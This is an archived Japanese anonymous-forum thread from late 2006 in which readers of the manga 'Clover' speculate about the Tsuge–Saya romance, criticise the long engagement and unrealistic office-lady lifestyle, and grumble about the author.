うざいな〜。そしてあんな世界なんて庶民感覚にナイから!なーんにも共感もドキドキも無い…来月からは見ないかな〜(とは言え立ち読みだけど。)

125 :花と名無しさん:2006/11/28(火) 21:52:38 ID:???0
あれでやっちまったら沙耶とは完全に終わりだろう

126 :花と名無しさん:2006/11/29(水) 01:02:40 ID:???0
あのままヤッちまって
事実を知った沙耶が、余計な事をした専務に怒りをぶつけて
その専務が沙耶に惚れるんだよきっと。

127 :花と名無しさん:2006/11/29(水) 03:17:35 ID:???O
コーラス読者はポカーン(゚д゚)だろうな、いきなりあんな漫画来て
ぶ〜けから読んでた自分もチヤトリ埋めたくなった

128 :花と名無しさん:2006/11/29(水) 16:34:26 ID:???0
柘植はお嬢とやる
    ↓
お嬢が本気になってアタックし始める
    ↓
沙耶にバレる(というかお嬢がばらす)
    ↓
沙耶と柘植の仲がピンチ
    ↓
双子片割れ再登場
てベタな展開になりそうな予感・・・

129 :花と名無しさん:2006/11/29(水) 17:12:23 ID:???0
どっちにしろ、
ハッピーエンドでくっつくんだから
うだうだしてないで、早く終わらせてくれないかな・・・

130 :花と名無しさん:2006/11/29(水) 17:30:32 ID:???0
柘植やらない
    ↓
むしろそれでお嬢が本気になってアタックし始める
    ↓
お嬢沙耶に宣戦布告
    ↓   
沙耶パニック 柘植を疑い二人にヒビが
    ↓
それを聞いた里李香が専務に直談判
    ↓
専務、里李香を気に入る
柘植と沙耶はなんだかんだでハッピーエンド
     


131 :花と名無しさん:2006/11/29(水) 17:43:41 ID:???0
柘植ってさぁ、色々と理由出して結婚遅らせてるよね。
だいたい今時、社長の娘との結婚断ったくらいで
クビになったり、出世に響いたりしないっつの。

132 :花と名無しさん:2006/11/29(水) 18:20:06 ID:???O
柘植さんが好きな漏れとしてはヤッちまったら続きはもう読まないだろーなW
つーか、柘植さんってこんなに弱っちー奴だったっけ?
断ったらどーとか悩むタイプじゃないと思ってたんだけど。

133 :花と名無しさん:2006/11/30(木) 01:44:38 ID:???0
そうそう、同族会社かなんかしらないけど
今の世の中ありえんよね。もちろん社長の娘とやっちゃって
妊娠させたならありだろうけど

ど う で も い い か ら は よ 終 わ れ ! ! !

134 :花と名無しさん:2006/11/30(木) 12:06:20 ID:???0
いやー今時でもなんでも、社長の娘との結婚断ったら
出世には関係してきますよ。
所詮は人間関係の集まりで感情が支配している部分は大きいので。
(今の時代には結婚に親戚は関係無いっていう夢と同じね)

でもそもそも、そんな話にならないように柘植が最初に
考えて手を打つ筈だしその辺が不自然だ…

どちらにしろ沙耶柘植ENDなんだろうし

ど う で も い い か ら は よ 終 わ れ ! ! !

135 :花と名無しさん:2006/11/30(木) 12:37:10 ID:???O
柘植がオーケーしちゃったらハッピーエンドは無理だよね

136 :花と名無しさん:2006/11/30(木) 13:12:10 ID:???0
俺 の 好 み じゃ な い
って何なのさ?乗換えフラグ?

137 :花と名無しさん:2006/11/30(木) 14:23:02 ID:???0
>>134
出世が早くなるくらいで出世が遅れるとか有り得ないですよw

柘植が段々きもくなってきてる。
前は好きだったのにー

138 :花と名無しさん:2006/11/30(木) 17:26:53 ID:???0
>137
出世が遅れるんじゃなくて、出世無縁になりかねないって事だよw

場合によってはお互いの為(私情を挟まない為)に別部門に移動とかは
普通にあるよ。(それによって今までに実績が無駄になる)

上司親族とのお見合いでもまだまだ大ごとだと思うけど?
知り合いがそれで大変だったもんそんなたいした会社じゃないのに

しかし柘植ってあんなにバカだった?

139 :花と名無しさん:2006/11/30(木) 17:45:25 ID:???0
今の状態で専務に断った方が、お嬢と関係をもつより
冷静に考えてもいいと思うけど沙耶の前フリ(?)から
するとやっちゃうのか?


140 :花と名無しさん:2006/12/01(金) 14:55:55 ID:???0
何で沙耶との結婚を公にしないんだろう。
婚約してどんだけ経ってんだよ。
婚約してます、でカドが立たずに断れないのかな?

141 :花と名無しさん:2006/12/01(金) 15:54:54 ID:???0
バカになったっていうか
これまで無かった柘植のモノローグを最近になってやりだした結果な気がする。
読者の脳内補完で済ませとけば良かったモノを…。

冒頭の「あの頃の私は…」ってとってつけたようなサヤのモノローグに凄い違和感を感じる…。
この作者、自分の私生活結構漫画に反映しちゃうらしーし、
ここ数年に自分に降りかかった出来事を漫画にして眺めてるのかなー、なんて思った。
男寝取られちゃったんですかね。チヤトリ先生。
まぁ漫画だから、サヤの方は幸せになるんだろーが…。

142 :花と名無しさん:2006/12/02(土) 03:44:58 ID:???0
>>140
まさにそうだよね。
二人は正式に婚約してるんだっけ?だとしたら、婚約破棄だと慰謝料
発生するし双方の親も黙ってないだろうし。
あと、沙耶って縁故採用で、親戚が会社のお偉いさんだった気がする。
同族経営とは言え、縁故で雇った自分の会社の社員と婚約してる
って分かっても結婚ごり押しするのかな。

今回はほんとに唖然としたよ。
コーラス仕様でヘタレ男の設定になったんだと思った。
柘植は「優秀な人材」って設定なんだよね?いっそのこと転職しれと
思った。ヘッドハンターが黙ってないよw
次号で「そんな条件呑めない!」と柘植辞表を叩きつけるって展開だと
見直すんだけどな。

               






143 :花と名無しさん:2006/12/02(土) 04:13:53 ID:1m563DarO
そーだよ、沙耶だって高橋監査役?の孫だったよね。
コネで入社して、沙耶母が央太の大学中退の時に
「おじさんに相談すれば沙耶の会社に入れる」とか言ってたし。
大学中退しても一流企業と描写されてる会社にコネ入社かよ、めでてーなと思った。
だいたい彼女の親父に結婚の挨拶もして、二年も結婚しないなんて不誠実。
沙耶の父親から即、そのコネのきく親戚に「今度娘が会社の男と結婚する」と伝わってもおかしくないし…
柘植さんの野心って今の会社で専務のご機嫌とりをしてでも出世することだったのか?だったら小さすぎ。
自分で独立して会社おこしたり、どんどん会社を変えるくらいのガッツがある男かと思ってたので。

144 :花と名無しさん:2006/12/02(土) 05:16:59 ID:???0
サブタイトル?が
沙耶のハッピー・クロニクルなのに
いきなり相手の浮気展開…コーラスの新規の読者から
したら主人公の女に同情するほど愛着もないし、
浮気されたところで気の毒でも何でもない。

別の女と結婚されてThe Endでもいいや。早く終わってくれれば

145 :花と名無しさん:2006/12/02(土) 10:46:47 ID:rMrxJ4/rO
みる度に柘植さんにむかつく。
婚約期間が長すぎだね。
ハルキの方が、良かったな。 サヤ可哀想

146 :花と名無しさん:2006/12/02(土) 11:28:30 ID:???O
婚約期間が伸びるごとにブランドものを買ってごまかす柘植…

147 :花と名無しさん:2006/12/02(土) 11:32:03 ID:???O
沙耶が結婚ひきのばしの代わりにもらってたカルティエのCハートがかわいい。
30万もするんだね。

148 :花と名無しさん:2006/12/02(土) 17:55:58 ID:???0
禿同。ハルキのほうが良かった。
けどハルキは沙耶なんかには勿体無いと思うようになったので
ハルキにはもっといい女と幸せになってほしい。

149 :花と名無しさん:2006/12/02(土) 18:10:24 ID:wiiAbdbu0
>沙耶母が央太の大学中退の時に
>「おじさんに相談すれば沙耶の会社に入れる」とか言ってたし。
>大学中退しても一流企業と描写されてる会社にコネ入社かよ、めでてーなと思った。

沙耶母が「おじさんに相談すれば沙耶の会社に入れる」って言ったのは、央太が中退しなかった場合の話。
大学中退=高卒では、何の資格もなくて、ただの監査役のコネってだけの央太は入社出来ないでしょ。
もう一度、単行本を読み返してみなよ。


そういえば、秘書課に男の人が増えたみたいだけど、ゆうちゃんのメルトモで沙耶に言い寄ってた小林さんはどこ行ったんだろう?
確か、センチュリーのフロントから転職して柘植さんの下に付いたはずだったけど・・・。


150 :花と名無しさん:2006/12/02(土) 18:32:57 ID:???O
小林さんは誰か役員について海外にずっと行っているらしい

151 :花と名無しさん:2006/12/02(土) 19:46:55 ID:???0
登場人物が多すぎ。

152 :花と名無しさん:2006/12/02(土) 22:56:58 ID:XqoZu+LlO
何巻か忘れたけど、いきなり絵柄が変わったので読まなくなったんだけどまだ続いてたんだね
しかも沙耶と柘植さんまだ進展なかったんだ…
恋カタ化してんの?

153 :花と名無しさん:2006/12/02(土) 23:23:36 ID:eJCSjGu80
主人公無視??みたいな感じ。


154 :花と名無しさん:2006/12/03(日) 01:21:31 ID:???O
専務とはなさないで父親(=社長)と話せばすぐ解決しそう。

155 :花と名無しさん:2006/12/03(日) 20:16:39 ID:???O
主人公がたくさんいてわけわからんわ。

156 :花と名無しさん:2006/12/03(日) 20:52:05 ID:???0
沙耶って柘植さんが初めてだったの?
時和くんと柘植さんの間は彼氏いた様子もないし。

157 :花と名無しさん:2006/12/03(日) 21:26:51 ID:???O
社長の姪を振った過去がある男がいまさら何を悩んでるのかわからん

158 :花と名無しさん:2006/12/04(月) 07:52:14 ID:vCXJ5NO+O
そういや妹尾さんをふっていたね。
社長の姪より娘のほうが近いし…
しかし姪の次は娘に手を出すのか、と
どっちにしても社長の心証悪そう。

159 :花と名無しさん:2006/12/04(月) 09:09:05 ID:???0
あー、思う!
なんで沙耶との関係を公にしないんだろう?それが一番の解決策なのに。
まあ、それやっちゃ連載が終わっちゃうから沙耶が「何で公にしないんだろう」ってイジイジなやんで
柘植さんがブランド物与えて、「こういう理由なんだよ、バカだな」とか適当に理由並べて
セックルって回もあるんじゃなかろうか。

160 :花と名無しさん:2006/12/04(月) 15:08:46 ID:???0
不誠実な男だよな〜
とっとと婚約、公にしろよ。
やっぱり沙耶との結婚迷ってんじゃないの?

つか出世欲マンマンなんだから
この際、沙耶捨てて社長令嬢と政略結婚でもすればー?

161 :花と名無しさん:2006/12/04(月) 17:30:12 ID:???O
社内恋愛が御法度な会社なわけじゃないんだし
(かずよや榊原はバレバレの社内恋愛から結婚)
柘植がプロポーズしときながらひた隠しにする理由がわからんよね。

162 :花と名無しさん:2006/12/05(火) 01:51:16 ID:???O
柘植の結婚引き延ばし=作者の連載引き延ばし
柘植のさやへのブランド物プレゼント=作者が経費で落として買うもの

163 :花と名無しさん:2006/12/05(火) 01:59:48 ID:???O
漫画まだ出ないんですか?
いつごろ出るとかも決まってないですか?
早く読みたいなー

164 :花と名無しさん:2006/12/05(火) 03:50:15 ID:???0
>>147
30万もするのか…驚いた。
普通の会社員の月収並(それ以上?)だね。
いくらお詫びの気持ちとは言え、婚約者からそんな高価な物もらったら嬉しいと
言うよりドン引き。将来のために貯金しとけよと思うだろうなw



165 :花と名無しさん:2006/12/05(火) 07:50:33 ID:???O
パリで買ったから20万か15万くらいかな?指輪。
どちらにしても多額の買い物を相談せずにする旦那はイヤだな…
誕生日プレゼントらしいが最初のころはシティホテル一泊と花束
次がハワイアンジュエリー(五万くらい?)
だんだんグレートアップしている
作者の欲望も…

166 :花と名無しさん:2006/12/05(火) 19:36:57 ID:???0
こういう買い物する男と一緒になると苦労するぞ
きっと食費は月2万しか渡さず
足りなくなって旦那に言うと
“やりくりがヘタなんじゃないのか?”とか言いそう

167 :花と名無しさん:2006/12/05(火) 22:06:01 ID:2T6V9XlxO
柘植さんって収入も良さそうだけど
目黒のマンション買ったりローンでBMW乗ったり
沙耶にブランド買ったりで支出も激しそうだよね。いつもいいもの食べてそうだし。飲みといったらホテルのバーだし。
縁談断って首になって二流、三流会社に転職になったら面白いのに…
柘植さんが2DKの賃貸アパートに住み、車はマーチやカローラで
ブランドものなし、食事はサイゼリヤかつぼ八で飲みだったら沙耶はついていくのだろうか。

168 :花と名無しさん:2006/12/06(水) 00:18:31 ID:SkH4dhTV0
>>167
連載当初の頃の沙耶だったら、そういう柘植さんでも付いていったのかもしれないけどね。
ハルキは貧乏だったし、沙耶はハルキが有名人とかいうことも知らなかったし、それでも、そんなハルキに揺れてたわけだし。

柘植さんと付き合ったことによって、沙耶は収入の良い男しか付き合えなくなっちゃっただろうね。
これで柘植さんに捨てられたら、大変なことになるね。
贅沢に慣れちゃってるって本当に怖い。



最近の「クローバー」、引き伸ばし作戦が嫌だ。
まだ「東京アリス」の方がいい。
アイスマン奥薗って何歳なんだ?ふうの上司ってことは、35〜6才?

169 :花と名無しさん:2006/12/06(水) 11:11:28 ID:d/TA5yz8O
久しぶりにみたら、柘植さんと専務と女しかでてない!沙耶すら後姿…

170 :花と名無しさん:2006/12/06(水) 23:55:12 ID:vbwVS8UY0
細かい事だが、柘植のマンションは親から受け継いだものだから
ローンは無いよ。ローン無しマンション付きの男だからかなり
美味しいと思う。

171 :花と名無しさん:2006/12/07(木) 02:10:32 ID:???0
柘植さんと奥薗さんって似てるね。
作者の好きなタイプなんだろうか

172 :花と名無しさん:2006/12/07(木) 07:55:00 ID:zg6FhrJ1O
背が高いエリートでクールでブランド好きな金持ちが好きなんでしょ
確信犯的な柘植さんはともかく、CHANELをよく知らないでバンバン女性にあげるなんてありえない>奥園
ふうにおれは無駄遣いしてないといってたがそれこそ無駄遣いじゃないか?

173 :花と名無しさん:2006/12/07(木) 12:08:36 ID:???0
漫画だからね。
最近、漫画がドラマ化するのが多いけど
何が次きたりするのかなーって思う。
間違いなくクローバーはないだろうけど・・・
ブランド手に入れるだけで
お金飛ぶね。



174 :花と名無しさん:2006/12/07(木) 22:01:09 ID:???O
マンションは親から譲られたもの、仕事中毒で親しい同僚も村岡くらい(その村岡も今はアラスカ)。
専務から被ったストレスを沙耶にブランド物をプレゼントして喜ばれることで解消してるでしょ。


175 :花と名無しさん:2006/12/08(金) 09:57:45 ID:u+3X7zOhO
奥園さんはかっこいいけど柘植さんはかっこよくない。髪の色の違い?

176 :花と名無しさん:2006/12/08(金) 14:24:49 ID:???0
奥園って誰だっけ

177 :花と名無しさん:2006/12/09(土) 22:29:52 ID:???0
東京アリスでしょ

178 :花と名無しさん:2006/12/09(土) 23:08:52 ID:???0
この作者躁鬱だったよ

179 :花と名無しさん:2006/12/10(日) 09:31:41 ID:???0
仕事手伝ったの?

180 :花と名無しさん:2006/12/12(火) 17:37:13 ID:???0
躁鬱なのは読者でも知ってる人多いよ。
それで、しばらく休んでたって聞いた。




181 :花と名無しさん:2006/12/15(金) 01:12:21 ID:YNTgW5mI0
連載当初、25歳の名香さんがお局みたいな感じで、女子社員たちは「やだねー」とか言ってたのに・・・。
沙耶なんて、もう26歳だよ・・・。
妹尾さんも「私なんてこんな年だし・・・」って27歳のときに言ってたけど、ロングなんて何歳になったんだよ・・・。
しかも、秘書課に21歳とかの女子社員がいて、「下界で数年修行して・・・」みたいな掟はどこ行ったんだ?
さまざまなことに矛盾が多すぎる。
まさか高卒で入社なんかしてないだろうな。
この会社は四大卒の女子社員はあんまりいないし、何だかおかしい。
ほとんどが短大卒なんて「???」って感じ。
登場人物の中で四大卒の女子社員は一葉とロングしか出てこない。
お嬢様って言われている妹尾さんですら、短大卒。(柘植と動機なのに二歳年下だから)
お嬢様がいまどき短大卒なんてありえないよ〜。

そして、最大の疑問。
この会社には総合職の女性はいないのか!?

182 :花と名無しさん:2006/12/15(金) 05:02:29 ID:dUq+qg0jO
沙耶がかずよが結婚しても会社を辞めなかった時に
「まさかキャリアアップ?うちの会社でそれはありえない」と言ってたし
柘植さんも「本社の女性は男性のサポートしかさせてもらえない。何年たってもその繰り返しだ」と言ってたし総合職いなそう。
多分作者がキャリアウーマンを書く気がまったくない&総合職がよくわからないんでは?
年齢の矛盾は私も感じていた。
沙耶が26になったならロングは少なくとも30…
28でそろそろお勤め辞めたらと親に言われてたのに、まだ勤めてていいのかな?

183 :花と名無しさん:2006/12/15(金) 05:31:04 ID:0v+oxKrmO
サザエさん方式と見た

184 :花と名無しさん:2006/12/15(金) 07:11:30 ID:YNTgW5mI0
ロングは婚約者とは別れたのかな?
ロングが沙耶たちと合コンに行く回あったけど、あそこで知り合った鳥専門の獣医とはどうなった??
柘植さんにちょっと似てる奥手な獣医で、ロングの飼ってたジュリエットっていう鳥を診てくれた人。
脇役についてもしっかりと描ききって欲しい。
「あれは何だったの???」っていうエピソードが多すぎる。



ホテル会社なのに女性が活躍できないなんてどんな企業だw
いまどき、お堅いといわれる銀行ですら、女性総合職がいっぱいでキャリアウーマンがたくさんいるぞ。
男女雇用機会均等法は無視かよ。
もしや、作者が勤めていた頃は、男女雇用機会均等法施行前か?
それとも、現場に行かされているのか?女性総合職。
いろいろ考えるとキリがないが。

一葉なんてキャリアウーマンでいけそうなのに、なんで沙耶やりりかみたいな腰掛と同じ仕事をしているんだろう。

185 :花と名無しさん:2006/12/15(金) 08:38:37 ID:dUq+qg0jO
作者が男女雇用機械均等法を知らない世代なんでしょ。四十代だっけ?
ロングは話の都合で二年たってもまだ婚約者と結婚せずズルズル、獣医さんともつかず離れずではないかな。
かずよのキャラは一番適当に振り回されてる気がする。
かずよは実在したら頭も良さそうだし、30くらいまで確実にキャリアを積んでそれなりの男をつかまえるはず。
決して腰掛け仕事のまま24だか25でバツイチとは結婚しないと思う。
しかもキャラに合わないハワイ挙式までやらされて気の毒…。

186 :花と名無しさん:2006/12/15(金) 09:23:59 ID:???0
>作者が男女雇用機械均等法を知らない世代なんでしょ。四十代だっけ?

うわあ、そうなのか。
ふつうそういうところは担当編集者が何とかするもんだと思うけど。
でも、仕事や恋愛に関してリアルを求めるなら「サプリ」読んどけ、ってかんじ。
この漫画にリアルは一切求めちゃいけないよ…。っつーか、この作者に。

187 :花と名無しさん:2006/12/15(金) 09:55:18 ID:???0
ちなみに整合性も求めちゃいけない気がする。
雰囲気漫画だよ。

188 :花と名無しさん:2006/12/15(金) 21:47:39 ID:???0
くそ漫画はやく終われ!
イライラする展開やめれ
所詮花男には勝てないんだから。
作者も自分の能ナシに気が付け!

189 :花と名無しさん:2006/12/20(水) 11:21:22 ID:???0
登場人物出しすぎたね。
全てのエピソードが中途半端に終わってるよ。
毎回いろんな人物が出てきても
読者は飽きるだけだし、
むしろ、あの展開はどうなった?!
って疑問が募るばかり。
もっと人物を突き詰めて書くべきだったと思うよ。


190 :花と名無しさん:2006/12/20(水) 15:42:12 ID:???0
荒れるだけ荒れてどうせメガネの元に帰ってきて
四葉のクローバーでも出てきて終わりなんだろうなぁ
前は真剣に読んでたのに、今はギャグマンガとして読んでるよ

191 :花と名無しさん:2006/12/21(木) 15:25:23 ID:yNYdGmVmO
こんなOL生活憧れるよ
都心の会社で楽な仕事してアフター5は友達や彼氏とオシャレな店で食事…
田舎の工場事務は車通勤でアフター5はTSUTAYAに寄るくらいだよ…
しかし26でババア扱いはつらいな。
こっちは女が少ないから20代ならまだチヤホヤされるよ。

192 :花と名無しさん:2006/12/21(木) 15:41:53 ID:???0
>>191
田舎の工場事務なんだw

193 :花と名無しさん:2006/12/22(金) 20:25:22 ID:???0
ちょっと現実離れしてるよな。
社長令嬢とか笑っちゃうって漢字w

194 :花と名無しさん:2006/12/22(金) 21:33:06 ID:???0
学生の頃憧れていたOL生活がクローバーにはあるw

195 :花と名無しさん:2006/12/22(金) 22:08:36 ID:???O
クローバー読んでOL楽しそうと思った。

196 :花と名無しさん:2006/12/23(土) 12:33:37 ID:???0
東京でOLだけど、沙耶たちみたいな生活するには金が掛かるよ。実家ならいいけど、一人暮らしならそれなりに掛かる。
しょっちゅう外でご飯食べたりとか、あんなに買い物したりとか、正直言って一般職の給料ではきついよ。
それだけならいいけど、ブランドバックとか洋服とかもそれなりにお金掛けなきゃいけないし(いけないってことはないけど、一応、身だしなみとして)。
同じ部署には頭が良くて顔もそれなりの独身の男性は何人かいるが、彼女がいないのにはそれなりに訳アリなんだなーって思った。
でも、たまにだけど、大学時代の友達とゴハン食べに行ったり、会社帰りにまったりとお茶したり、楽しいことは楽しい。
ただ、金がかかるので、家では質素に暮らしてる。食費に金は掛けないように頑張ってる。


チラシの裏、スマン。


197 :花と名無しさん:2006/12/23(土) 18:58:11 ID:???O
それなりの企業だからそこらのOLより給料はいいだろう

198 :花と名無しさん:2006/12/25(月) 10:41:31 ID:3nHZVnihO
給料が安いって描写はないが、五年勤めたリリカの貯金が八万しかない程度か…
リリカが使いすぎなんだろうか…

199 :花と名無しさん:2006/12/25(月) 13:23:44 ID:???0
年収いくらぐらいを想定してるんだろ?
あんなにバンバン買い物してたら生きていけないと思うんだが。
あんな年にもなって親が援助してんのかね。

200 :花と名無しさん:2006/12/25(月) 13:27:21 ID:???O
月収手取り20くらいはあるのかな?

201 :花と名無しさん:2006/12/25(月) 15:12:27 ID:???O
普通にいってると思う

202 :花と名無しさん:2006/12/25(月) 15:58:50 ID:???0
沙耶って青山に住んでるんだよね
相当な金持ちだよね

203 :花と名無しさん:2006/12/25(月) 18:18:19 ID:???O
>>198
沙耶は入社から毎月四万貯金してるから、りりかが使いすぎなのかと


204 :花と名無しさん:2006/12/25(月) 19:02:45 ID:???O
時代設定が今というよりOLが『夜お茶』とか言ってた時代みたい。
だってブランド品だの、高級ランチだのって贅沢すぎるOLライフなんだもん。

205 :花と名無しさん:2006/12/26(火) 00:51:15 ID:???O
>>202
青山じゃなくて実家は世田谷じゃない?
青山だったら、原宿にある会社が近すぎる。

206 :花と名無しさん:2006/12/26(火) 01:12:39 ID:???0
でも実際の話、沙耶の会社ってホテルでしょう?
いま、あんなアホOLに破格の給料を出せるホテルって
ありえないように思う。
日本の一流ホテルのほとんどが四苦八苦しているこの時代に
社長もジュニアも身内の結婚に口出ししてる場合か?
トップがこんなじゃ、とうに外資に乗取られてるよね。

207 :花と名無しさん:2006/12/26(火) 08:36:47 ID:y9MfbKtJO
沙耶よりゆうちゃんみたいに同じ会社の2、3こ上の先輩と付き合うのが憧れるな。
タッキー、イケメンでおぼっちゃんだし。
五つ子の兄弟はいやだけど。
ゆうちゃんの親はなぜゆうちゃんが二十歳くらいになってから今更子供を作ったのか…

208 :花と名無しさん:2006/12/27(水) 13:14:12 ID:???0
柘植いい加減にしろよ…
とさっき今月号読んで更に思った。このまま沙耶の電話にでずにお嬢とやるんかいな。

209 :花と名無しさん:2006/12/27(水) 16:06:05 ID:???0
>>208
えー明日発売だよね?
早く立ち読みしたいなぁ。
208読んでるといずれまたはるきの出番が出てきそうな予感・・・

210 :花と名無しさん:2006/12/27(水) 21:40:37 ID:???0
まあ沙耶みたいにフラフラしないと思うけどね>柘植さん


211 :花と名無しさん:2006/12/27(水) 23:25:34 ID:???0
ツゲというか作者いい加減にしろよ。
社長令嬢を自宅につれてくのはバカか?
こういう展開がいらいらするんだよなぁ。
さやが電話に出ないの気にしてツゲ宅に押しかけて
バレる展開なんだろw

212 :花と名無しさん:2006/12/28(木) 00:57:56 ID:???0
それはまたまた馬鹿馬鹿しい展開になってますね…w
婚約者いる男が自宅に女つれてくるとか、アホらしい。

213 :花と名無しさん:2006/12/28(木) 05:58:41 ID:???O
なんで柘植はサヤと結婚しない、又は婚約を公表できないんだ
たらたらやっとる間にリリカはアラスカ行って帰ってきて多分子供産んでるのに

214 :花と名無しさん:2006/12/28(木) 12:18:11 ID:???O
コーラス読者には彼女持ちの男に恋をするが素直になれない女が主人公の話だろうね


215 :花と名無しさん:2006/12/28(木) 13:01:41 ID:zlkqxZX8O
栞がかわいそうになってきた。
なんか翠の時のヤリマンみたいに同情させといてばっさり振られる展開か。
外人の元旦那と元サヤか。

216 :花と名無しさん:2006/12/28(木) 14:00:07 ID:???0
コーラス移籍から読み始めた私にとっては
クローバーという作品の主人公はツゲさんという男、ヒロインは令嬢で
サヤって子は脇役にしか見えないw

217 :花と名無しさん:2006/12/28(木) 17:57:37 ID:???O
このまま柘植さん、やっちまうと思う人 ノ

218 :花と名無しさん:2006/12/28(木) 18:25:14 ID:???0
なんじゃこれぇ
柘植さんて・・・きもい
この男は、沙耶が奪われそうにならないと愛情確認出来ないのか?
お嬢様と寝る
  ↓
沙耶にバレる
  ↓
仕事の為と思いきや、お嬢にも惹かれてる自分に気付く
沙耶とお嬢の間で揺れる男心〜〜
  ↓
そうこうしてる間に双子再登場
今後はこんな感じだろうか  

219 :花と名無しさん:2006/12/28(木) 19:52:54 ID:???O
いやいやいや
なぜか沙耶に惚れるジュニア→えみり嫉妬づ栞と柘植の関係ばらす
がおもしろいよ

220 :花と名無しさん:2006/12/28(木) 20:55:57 ID:???O
栞と柘植の組み合わせは沙耶より好きかも。
初期でも柘植と元彼女のキャスターのほうが似合うと思ったし。
気の強いタイプにペースを崩される柘植は見てて楽しい。

221 :花と名無しさん:2006/12/28(木) 21:54:13 ID:???0
さすがに栞とは寝ないと思うけどね
寝たら最悪だ

でもあゆこと翠の話でこの人の漫画ある意味耐性付いてきたかもw

222 :花と名無しさん:2006/12/28(木) 22:07:37 ID:???0
寝て欲しくないなぁ
柘植さんメチャ好きなんで、そんな柘植さんは見たくないよ

作者が沙耶とハッピーエンドにするつもりならヤラせない!と思いたいけど
最近の流れを見てると、こんな大事件があったけど乗り越えて幸せになりました〜と持っていきかねんのでorz

223 :花と名無しさん:2006/12/28(木) 22:25:18 ID:???0
つか栞が勝手に柘植さんに惚れてるだけでしょ
あれしきの事でそんな簡単に揺らぐようなタイプでもないし
寝ないと思うんだけどなあ

224 :花と名無しさん:2006/12/28(木) 23:29:16 ID:zlkqxZX8O
柏原(巨乳)にかなり迫られた時沙耶に泣かれるからと拒否したんだから
ここまできて栞とやってほしくないなあ
しかし最近は東京アリスでセックスマイスターだの
露骨な表現が多いね

225 :花と名無しさん:2006/12/29(金) 01:23:54 ID:???O
もー酷いよこの漫画…。
柘植最悪。っていうかプライベートまでこき使われる(しかも専務だかの姉に?)のって有り得なくない?
下らないからさっさと終われ…。買ってしまったコミックス10冊分、金返せって感じ。
昔は面白かったのにな〜。見るとイライラするけど、つい読んでしまうのは…モサマンレベルか?

226 :花と名無しさん:2006/12/29(金) 01:59:51 ID:???0
最後、もし沙耶が柘植以外と一緒になったらこの漫画伝説になる!!

227 :花と名無しさん:2006/12/29(金) 04:59:32 ID:???O
作者の男性経験のなさと欲求不満が、そのまま現れてしまってる

228 :花と名無しさん:2006/12/29(金) 08:56:24 ID:???O
沙耶みたいなのと付き合う時点て萎える
所詮自分より下でトロくて調教しやすいタイプが
好きなんでしょ つげ

229 :花と名無しさん:2006/12/29(金) 10:23:35 ID:KuUNUAO7O
伊集院さんはキャリアウーマンでかわいげがないから別れた?
栞、自分の従妹の妹尾さんが付き合ってたころから気になってたんだ?
従妹の元彼なんかやだー。

230 :花と名無しさん:2006/12/29(金) 21:06:36 ID:???O
そういえばサヤと妹尾さんって雰囲気にてるんだよね
その妹尾さんとやっぱり似てる栞と一緒にいて、サヤの電話に出ない…
も〜別れなよ
どうせサヤにはえみりが告げ口するんだし

コーラスになってから、誰か言ってたように柘植主役で栞相手役、
サヤは二人の障害にしか見えない

231 :花と名無しさん:2006/12/29(金) 21:55:17 ID:???O
柘植のモノローグが入るようになってからこいつ女々しいなと思ってきた
心理描写がなければクールに見えてたのに
親に挨拶して花嫁修業までやらせときながら二年もズルズルしてるんだから
女々しいってか段取り悪いよなあー
沙耶親怒ったっていいところだよ
もともと反対してたんだし

232 :花と名無しさん:2006/12/29(金) 22:22:25 ID:???0
確かに柘植さんと栞さんが出来上がるまでの話に見える。
ここで沙耶&ジュニア、柘植&栞にシフトチェンジしたらある意味神w

233 :花と名無しさん:2006/12/29(金) 22:33:57 ID:???O
もうそれでいいかも
沙耶にハルキはもったいないからジュニアでいい
えみりと取り合ってくれ
ここでようやくジュニアとえみりの登場に意味が出てくるのかw

57 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)